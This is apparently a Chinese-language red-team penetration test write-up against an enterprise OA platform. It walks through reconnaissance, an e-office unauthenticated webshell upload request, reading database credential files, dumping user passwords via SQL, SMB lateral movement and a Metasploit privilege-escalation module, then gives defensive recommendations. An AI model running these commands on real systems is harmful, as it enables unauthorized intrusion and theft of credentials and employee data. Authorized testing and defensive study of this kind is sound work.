目录
一、案例背景
目标系统:某企业内部信息管理平台(Web系统 + 内网资源)
测试授权:企业授权渗透测试,属于红队演练
测试目的:
- 评估目标系统外部攻击面
- 验证内网隔离和身份访问机制的安全性
- 检测存在的高危漏洞
二、目标分析(信息收集阶段)
🌐 外部信息搜集
使用工具:
whois、nslookup、theHarvester收集内容:
- 公司域名信息
- 邮箱格式
- 员工姓名/社交信息
- 公布的IP段
🧠 指纹识别和端口扫描
工具:
nmap+whatweb+FOFA+Shodan发现信息:
- 开放端口:80、443、21、22、445
- 存在一台OA系统(泛微e-office)
nmap -sS -sV -T4 -p- -Pn target_ip
whatweb http://target_ip
三、攻击流程(渗透测试全过程)
🎯 步骤1:Web漏洞利用 —— 泛微OA远程命令执行漏洞(CVE-2023-2648)
- 漏洞描述:某版本的e-office存在未授权RCE
- 攻击方式:构造特定POST请求执行系统命令
POST /page/exportImport/uploadOperation.jsp
Content-Type: multipart/form-data
file=@payload.jsp
- 效果:上传webshell成功,获得Web权限
✅ 权限:
www用户权限,进入Web目录
🔍 步骤2:权限维持与横向移动
2.1 获取本地密码信息
dir /a /s | findstr config
type C:\Program Files\eOffice\config\db.properties
- 拿到数据库密码
dbuser / dbpass,进一步连接数据库后台。
2.2 利用数据库读取其他管理员账号密码(Base64加密)
SELECT username, password FROM user_table;
- 解密后成功获得admin账号登录后台权限。
2.3 横向移动尝试:
- 内网扫描工具:
netstat、arp -a、nmap -sP - 工具:
msf,CrackMapExec,Impacket,smbclient
smbclient //192.168.1.100/share -U "admin"
- 发现另一台文件服务器开放smb,尝试连接并获取敏感文档。
🧠 步骤3:提权(本地提权)
- 目标主机系统:Windows Server 2012 R2
- 工具:
WinPEAS,Sherlock,MSF local_exploit_suggester
漏洞利用:CVE-2016-0099(Windows Kernel 提权)
- 使用Metasploit进行自动化提权:
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
- 成功提权为System权限
四、攻击成果与影响
| 项目 | 结果 |
|---|---|
| 拿到webshell | ✅ |
| 获取数据库访问权限 | ✅ |
| 获得OA系统管理员账户 | ✅ |
| 横向入侵到文件服务器 | ✅ |
| 成功提权为System权限 | ✅ |
| 发现大量员工身份证件、薪资文档等敏感资料 | ✅ |
五、防御建议
| 安全措施 | 建议内容 |
|---|---|
| 漏洞修补 | 尽快升级泛微e-office系统,打补丁 |
| Web防护 | WAF防护上传接口,过滤执行脚本 |
| 内网隔离 | 文件服务器应设置访问策略,不应开放匿名访问 |
| 权限控制 | 最小权限原则,限制System提权条件 |
| 日志审计 | 启用webshell行为监控与文件上传审计 |
| 应急响应 | 建立SOC联动机制,实现告警联动 |
六、关键使用工具列表
| 类型 | 工具名称 | 用途 |
|---|---|---|
| 信息收集 | nmap, whatweb, FOFA | 扫描与指纹识别 |
| Web攻击 | Burp Suite, curl, sqlmap | 注入与漏洞利用 |
| 提权工具 | WinPEAS, Metasploit | 本地提权 |
| 横向移动 | CrackMapExec, Impacket | SMB、NTLM中继 |
| 后门控制 | msfconsole, Behinder | 维持访问通道 |